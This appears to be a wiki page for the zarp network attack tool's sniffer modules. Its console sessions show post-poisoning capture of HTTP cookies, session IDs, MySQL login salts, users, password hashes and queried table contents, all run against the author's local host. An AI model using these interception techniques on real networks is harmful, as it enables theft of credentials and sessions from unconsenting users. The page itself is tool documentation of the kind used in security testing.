Skip to content

Sniffers

Jump to bottom Edit New page
bryan alexander edited this page Jul 29, 2014 · 1 revision

These post-poisoning modules are useful for intercepting interesting traffic. Currently included are HTTP, Password, Traffic, and Database sniffers.

Here is an example of sniffing local HTTP traffic, and parsing out the cookies:

	[1] HTTP Sniffer
	[2] Password Sniffer
	[3] Traffic Sniffer

0) Back
> 1
[!] Enter address to listen for HTTP packets from: 192.168.1.42
[!] Enter verbosity level: 
	[1] Site Only
	[2] Request String
	[3] Request and Payload
	[4] Custom Regex
> 4
[!] Enter regex: Cookie: (.*)
[!] Output dumping in 'Custom Regex' verbosity.
[!] Sniff HTTP traffic from 192.168.1.42.  Is this correct?

The module is now parsing HTTP traffic for all cookies, which can either be logged to a file or output to the screen:

> 7

	[Running sessions]
[!] HTTP SNIFFERS [http]:
	[0] 192.168.1.42


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
> 2
[module] [number]> http 0
[!] Dumping HTTP from 192.168.1.42...
Cookie: NID=66=tL9bCtWv7lzgC6wY47YP4FgEXFAdl5omRaqOVYR7kNpfUzjk4-bgXWOCj7ZFYGJw-c9em0lDhuWVYGIIDFb0Bd0GVLcb25mzfAhCck2M2vKBh8THqeTXNY3x0dxTYiD1; 
Cookie: AA002=1352264798-3207528; MUID=1B8EFFB46EA86BFB02B8FBA56DA86BC4
Cookie: MUID=283C358E70B2646935A
Cookie: MUID=283C358E70B2646935A931C174B26476&TUID=1; WT_FPC=id=************-1024299920.30272855:lv=1357611500721:ss=1357611500709
Cookie: MUID=283C358E70B2646935A931C174B26476&TUID=1; WT_FPC=id=************-1024299920.30272855:lv=1357611500721:ss=1357611500709; 
Cookie: ACOOKIE=C8ctADY4LjEzLjE1Mi4xNTYtMTAyNDI5OTkyMC4zMDI3Mjg1NQAAAAAAAAABAAAAKwIAACCe61AgnutQAQAAABMAAAAgnutQIJ7rUAAAAAA-
Cookie: ACOOKIE=C8ctADY4LjEzLjE1Mi4xNTYtMTAyNDI5OTkyMC4zMDI3Mjg1NQAAAAAAAAABAAAAKwIAACCe61AgnutQAQAAABMAAAAgnutQIJ7rUAAAAAA-
Cookie: WT_NVR=0=/:1=en-us; WT_FPC=id=68.13.152.156-1024299920.30272855:lv=1357611500721:ss=1357611500709;

This is the result of browsing around on the internet from my local system. SSL encrypted websites will not be accessible until the sslstrip attack has been implemented into zarp.

Another example with the database sniffer:

	[Running sessions]
[1] DatabaseSniffer
	[0] 192.168.1.42


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
> 2
[module] [number]> 1 0
[!] Dumping Database from 192.168.1.42...
[!] Protocol: 10
[!] Version: MySQL 5.5.27
[!] Salt: 71594c51303a714e0072716277516d512f365d5677
[!] User: bryan
[!] Password hash: 3cd8eb4a2549313e6482341eb866e80a001b4280
[!] Login success.
[!] Query: select @@version_comment limit 1
[!] ['@@version_comment']
[!] ['MySQL Community Server (GPL)']

This module is currently capable of sniffing MySQL and PostgreSQL sessions, established or establishing.

[!] Dumping output from 'Database Sniffer'...
[!] Protocol: 10
[!] Version: MySQL 5.5.27
[!] Salt: 7c2a59615c29544e006b502f386c3a786e423e4f50
[!] User: bryan
[!] Password hash: 72d0ce3b7049aa77d67b5f2e9cc49dee394f6b0e627279616e00
[!] Login success.
[!] Query: show databases
	Database          
	------------------
	information_schema
	             bryan
	             cdcol
	             mysql
	performance_schema
	        phpmyadmin
	              test
	           webauth
	         webissues
	------------------
[!] Query: show tables
Tablesinbryan = experimenter
[!] Fetching table fields: experimenter
[!] Query: select @@version_comment limit 1
versioncomment = MySQL Community Server (GPL)
[!] Query: select * from experimenter
	ExpterID | Name        | Email            | Dept        | Institution
	---------+-------------+------------------+-------------+------------
	   10001 |         Bob |   [email protected] |          CS |         UNO
	   10002 |        Jack |    [email protected] |     biology |         UNO
	   10003 |     Johnson | [email protected] |     biology |         UNO
	   10004 | Henry Frink |   [email protected] | engineering |         UNO
	   10005 |    John Doe |     [email protected] |          CS |         UNO
	---------+-------------+------------------+-------------+------------

Stuff to do with this includes: support more databases, further testing on older MySQL versions, and cleaner output.

And session ID sniffing (obviously not real session id's):

> 2
[module] [number]> 1 0
	Host           | SessionID   
	---------------+-------------
	www.google.com |    343434434
	    google.com |    343434434
	   192.168.1.1 | 234234234234
	---------------+-------------

	[Running sessions]
[1] HTTP Sniffer
	[0] 192.168.1.42 [Session IDs]


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
>
Add a custom footer
Add a custom sidebar
Clone this wiki locally